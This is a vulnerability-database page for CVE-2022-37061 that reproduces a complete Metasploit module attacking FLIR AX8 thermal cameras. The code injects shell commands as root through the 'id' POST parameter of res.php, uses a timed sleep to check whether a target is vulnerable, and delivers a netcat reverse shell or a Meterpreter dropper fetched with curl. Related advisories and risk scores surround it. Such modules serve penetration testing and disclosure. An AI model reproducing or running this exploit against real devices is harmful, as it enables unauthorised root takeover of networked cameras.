Lucene search
K

FLIR AX8 unauthenticated RCE

FLIR AX8 thermal sensor cameras vulnerable to Remote Command Injectio

Related
Code
ReporterTitlePublishedViews
Family
0day.today
FLIR AX8 1.46.16 Traversal / Access Control / Command Injection / XSS Vulnerabilities
22 Aug 202200:00
zdt
0day.today
FLIR AX8 1.46.16 Remote Command Execution Exploit
22 Aug 202200:00
zdt
0day.today
FLIR AX8 1.46.16 Remote Command Injection Exploit
2 Nov 202200:00
zdt
ATTACKERKB
CVE-2022-37061
18 Aug 202200:00
attackerkb
Circl
CVE-2022-37061
18 Aug 202222:26
circl
CNNVD
Teledyne FLIR AX8 操作系统命令注入漏洞
18 Aug 202200:00
cnnvd
Check Point Advisories
FLIR AX8 Thermal Camera Command Injection (CVE-2022-37061)
21 Nov 202200:00
checkpoint_advisories
CVE
CVE-2022-37061
18 Aug 202200:00
cve
Cvelist
CVE-2022-37061
18 Aug 202200:00
cvelist
Exploit DB
FLIR AX8 1.46.16 - Remote Command Injection
16 Apr 202500:00
exploitdb
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FLIR AX8 unauthenticated RCE',
        'Description' => %q{
          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
          in the res.php endpoint.

          This module uses the vulnerability to upload and execute payloads gaining root privileges.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
          'h00die-gr3y' # metasploit module
        ],
        'References' => [
          ['CVE', '2022-37061'],
          ['PACKETSTORM', '168114'],
          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
        ],
        'DisclosureDate' => '2022-08-19',
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  def execute_command(cmd, _opts = {})
    action_id = rand(1..40)
    return send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'uri' => normalize_uri(target_uri.path, 'res.php'),
      'vars_post' => {
        'action' => 'alarm',
        'id' => "#{action_id};#{cmd}"
      }
    })
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    print_error("Communication error occurred: #{e.message}")
    return nil
  end

  # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution
  def check
    print_status("Checking if #{peer} can be exploited!")
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end

    return Exploit::CheckCode::Unknown('No response received from the target!') unless res

    print_status("Elapsed time: #{elapsed_time} seconds.")
    return CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time

    CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Jul 2026 19:05Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.99607
237